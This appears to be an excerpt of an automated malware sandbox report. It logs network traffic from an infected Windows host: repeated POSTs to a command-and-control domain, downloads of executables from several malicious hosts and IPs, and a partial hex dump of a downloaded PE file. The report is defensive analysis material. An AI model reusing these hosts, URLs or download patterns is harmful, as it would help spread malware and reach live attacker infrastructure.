00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:23 GMTContent-Type: application/octet-streamContent-Length: 2387648Last-Modified: Thu, 13 Jan 2022 21:51:33 GMTConnection: keep-aliveETag: "61e09ee5-246ec0"Expires: Thu, 20 Jan 2022 23:16:23 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lkoyuevdx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://secxfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vuafh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psxblf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dsdofcnp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obbsps.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttkljrkl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fvjjmgnhpi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://giblvuodn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unjilfapdr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnrfjahkht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://epntadtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yevvbkvx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psfbiu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phnfrhmjav.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etxdniy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlotvuqfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjfnimnu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkbyakqqj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://reeitd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vnmaltjgi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmegeducg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ghiodndfpo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njpun.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmhfrtkprf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynkqvnpya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pnfnlpnysf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mosjbuj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oytdv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rljjkyrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpqcmep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fosbja.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcjgja.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yivbbwxtct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqwogmqhb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvhsbw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oyghbp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yuvwrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkujdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyyanes.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tyjpjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsxrkuta.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jlgqjcjkdy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avcxisfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mvsed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pgctyuwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://surulybuu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thylpwqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rhglrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbxsgfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aoavvcteey.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tqnyuoui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqlstnrw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbwqss.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://toosx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dokqsat.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pipoxpya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbrirc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwskrgjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwahu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnfmckfat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htagjvn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nadbxcytci.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvnyptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.4:49807 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.4:49908 -> 86.107.197.138:38133
                          Source: unknownNetwork traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.4:49829 -> 40.93.212.0:25
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                          Source: WerFault.exe, 00000012.00000003.793911909.00000000010E9000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.796410725.00000000010E9000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000002.828113364.00000188ABAEB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
